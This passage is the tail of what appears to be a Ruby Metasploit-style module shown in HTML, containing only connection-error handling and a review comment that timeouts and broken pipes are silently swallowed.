/> print_status("Request sent to #{rhost}:#{rport}")<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Couldn't connect to #{rhost}:#{rport}")<br /> # NOTE(review): timeouts and broken pipes are swallowed without any status output.<br /> rescue ::Timeout::Error, ::Errno::EPIPE<br /> end<br /> end<br />end<br /></code></pre>